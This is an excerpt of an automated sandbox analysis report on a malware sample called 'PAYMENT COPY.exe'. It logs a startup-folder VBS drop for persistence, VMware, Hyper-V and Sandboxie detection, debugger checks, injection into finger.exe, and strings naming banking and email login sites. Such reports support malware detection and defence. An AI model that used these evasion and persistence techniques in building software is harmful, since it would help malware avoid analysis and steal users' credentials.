                      barindex
                      Drops VBS files to the startup folder
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbsJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbsJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 7040, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: HashSize.exe PID: 6792, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFA424ED324
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFA424ED7E4
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFA424ED944
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFA424ED504
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFA424ED544
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFA424ED1E4
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFA424F0154
                      Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFA424EDA44
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: PAYMENT COPY.exe, 00000000.00000002.1027702847.00000000029CF000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1278877272.00000000026AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeMemory allocated: DE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeMemory allocated: DE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeMemory allocated: D90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeMemory allocated: 2680000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeMemory allocated: 2400000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A21AE rdtsc 1_2_010A21AE
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeWindow / User API: threadDelayed 2245Jump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeWindow / User API: threadDelayed 7726Jump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeAPI coverage: 0.8 %
                      Source: C:\Windows\SysWOW64\finger.exeAPI coverage: 2.9 %
                      Source: C:\Windows\SysWOW64\finger.exe TID: 2328Thread sleep count: 2245 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\finger.exe TID: 2328Thread sleep time: -4490000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exe TID: 2328Thread sleep count: 7726 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\finger.exe TID: 2328Thread sleep time: -15452000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe TID: 3188Thread sleep time: -85000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe TID: 3188Thread sleep count: 39 > 30Jump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe TID: 3188Thread sleep time: -58500s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe TID: 3188Thread sleep count: 42 > 30Jump to behavior
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe TID: 3188Thread sleep time: -42000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\finger.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_02BBCB70 FindFirstFileW,FindNextFileW,FindClose,4_2_02BBCB70
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: dev.azure.comVMware20,11696497155j
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: global block list test formVMware20,11696497155
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                      Source: HashSize.exe, 00000006.00000002.1271346934.0000000000852000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCCa
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                      Source: HashSize.exe, 00000006.00000002.1278877272.00000000026AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: tasks.office.comVMware20,11696497155o
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                      Source: PAYMENT COPY.exe, 00000000.00000002.1027023009.0000000000889000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3348989479.0000000002FAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: wscript.exe, 00000005.00000002.1134527138.0000022BF4F24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                      Source: BMYdhGJqo1.exe, 00000008.00000002.3350372430.0000000000B29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{{
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                      Source: wscript.exe, 00000005.00000002.1134527138.0000022BF4F24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: finger.exe, 00000004.00000002.3353879564.00000000053EE000.00000004.10000000.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3353285344.000000000432E000.00000004.00000001.00040000.00000000.sdmpBinary or memory string: <p><a href="https://www.star.ne.jp/"><img src="data:image/gif;base64,R0lGODlhmAAbAPcAAJORkXPC5+vr6o6NjAmT1SSf2ujo6K3b8R6c2YyKihCW1vb29vHx8eLi4trv+Wm+5qalpc/OzmK65LTe8qLW702w4ZaVlJ6dne3t7ZrS7jyp3oXJ6tLr939+fcbm9XZ0dACDz0lHRun1+xWY13p4eFhWVSOe2ubm5vj4+KTX8MjIyECr3+Tk5ACK0sTExCKe2VCy4TGl3OHy+l245OHh4cHk9fX6/VS04tPT01ZVVEE/PqnZ8AaS1QCN0z08Ozw6OURDQlxaWU9NTIiHh0eu4Pr9/gSR1F5dXGRjYmNhYYqJiFNRUM7p9wCI0VtZWbjg85qZmXx7emdlZYF/fyag2r29vBiZ2ACF0A2U1nh3dtbt+HRzcoKBgP///29ubb7j9BKX17Ld8jmn3YSCgnnE6GxramhnZgqT1QaR1AKQ1AKP1Dg2NSCd2cHBwEZEQ93c3CGd2fb29Y2Miyqi2/T09PPz89nY2KGgoL6+ve7u7la14vz8/N/f34mIh8fGxjs5OMrJyfr6+mBeXfv7+6inpjk3NmloZ62srNbW1rKxsd7e3vX19To4N8LCwSGe2e/v7/7+/kdFRKuqqVpYV1VTUkJAP0Os3/Ly8tbV1Q+W1pybmqiop5GQj11cW/39/cbFxUNBQExKSa6tra+urabY8O/u7rm4uLq6udjY18vKyv7//yig2ra1taqpqZ2cm1JQT2a85eDf37y7u09OTff8/ktJSE5MS6Ggn/r5+bq5uJCPj7++voWEg/Py8tXU1MPCwtrZ2cro9qKhoWW75aurqg+V1p/V77W0tLOzsra2tWy+5pWUk7Cvryaf2kWt3zam3ZeWlimi25mYl0pIRxyb2IvM62VkYxma2KCfnsTDw4GAf1ZUU4eGhRSX1xOT1QKQ01i146+vruf0+8Dj9MjHx4HI6j89PLe2tuTz+/L5/dDQz+33/MzMzM7NzQB8zRCV1ufn5nNxcJDO7OPj4q/c8ayrq9ra2tHQ0NLR0bGwsLOysaOioqmoqNTU06XY7wyU1SH/C1hNUCBEYXRhWE1QPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS42LWMxMzggNzkuMTU5ODI0LCAyMDE2LzA5LzE0LTAxOjA5OjAxICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtbG5zOnhtcD0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLyIgeG1wTU06T3JpZ2luYWxEb2N1bWVudElEPSJ4bXAuZGlkOjk5NTgzMjIwLWJlMzItMzE0OC05YTM2LThjMjIwOGQwNjhkMyIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDpFNDk5NUIzQzFEOEIxMUU3OTBCOEU0NDZDMzE4NTM3RiIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDpFNDk5NUIzQjFEOEIxMUU3OTBCOEU0NDZDMzE4NTM3RiIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgQ0MgMjAxNyAoV2luZG93cykiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo3NWU3N2M0ZC1iMjc5LWJhNGYtYjg0Ny04OGRhN2Y4NTFiYjIiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6OTk1ODMyMjAtYmUzMi0zMTQ4LTlhMzYtOGMyMjA4ZDA2OGQzIi8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+Af/+/fz7+vn49/b19PPy8fDv7u3s6+rp6Ofm5eTj4uHg397d3Nva2djX1tXU09LR0M/OzczLysnIx8bFxMPCwcC/vr28u7q5uLe2tbSzsrGwr66trKuqqainpqWko6KhoJ+enZybmpmYl5aVlJOSkZCPjo2Mi4qJiIeGhYSDgoGAf359fHt6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYWBfXl1cW1pZWFdWVVRTUlFQT05NTEtKSUhHRkVEQ0JBQD8+PTw7Ojk4NzY1NDMyMTAvLi0sKyopKCcmJSQjIiEgHx4dHBsaGRgXFhUUExIREA8ODQwLCgkIBwYFBAMCAQAAIfkEAAAAAAAsAAAAAJgAGwAACP8Auwgc2IUDrBhzEipUqEwLwYcQI0qcSLGixYsYM2qM+ISNx48vFPAgMLIAHA4bU6pcybJlygkgP6aJUYFIhRjdTFhyybOnz58Tw8SEw6YJjHQEVxBgIwOo06dQMR4YWvQGRDFLm1K0B2FAlCGuPj2KOjECtj5f90WIQ/YpKapGrxrRqWoinzJr8updAwDiAgZQVXTaWygvq7ZAU8CdIZcoE7s/COvFM3DeqA6RhD11IVmvIsQ+ayxuzKYGxcF6O2gCkARUnoGC9PJzusCHXh3cNCUoUQK0T0tDjcB6uC5GE8eQIOvFQbBOcoFIZEtkwGLsRQyeBFa5Taf5dHiDLNb/wZ59owA
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                      Source: firefox.exe, 00000010.00000002.1458178504.000002E1FD98C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT%
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: AMC password management pageVMware20,11696497155
                      Source: HashSize.exe, 00000006.00000002.1278877272.00000000026AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: discord.comVMware20,11696497155f
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: outlook.office.comVMware20,11696497155s
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                      Source: 4ub-1K1Qxn.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A21AE rdtsc 1_2_010A21AE
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00417E13 LdrLoadDll,1_2_00417E13
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E10E mov eax, dword ptr fs:[00000030h]1_2_0107E10E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E10E mov ecx, dword ptr fs:[00000030h]1_2_0107E10E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E10E mov eax, dword ptr fs:[00000030h]1_2_0107E10E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E10E mov eax, dword ptr fs:[00000030h]1_2_0107E10E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E10E mov ecx, dword ptr fs:[00000030h]1_2_0107E10E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E10E mov eax, dword ptr fs:[00000030h]1_2_0107E10E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E10E mov eax, dword ptr fs:[00000030h]1_2_0107E10E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E10E mov ecx, dword ptr fs:[00000030h]1_2_0107E10E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E10E mov eax, dword ptr fs:[00000030h]1_2_0107E10E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107E10E mov ecx, dword ptr fs:[00000030h]1_2_0107E10E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FCC0F0 mov eax, dword ptr fs:[00000030h]1_2_00FCC0F0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD80E9 mov eax, dword ptr fs:[00000030h]1_2_00FD80E9
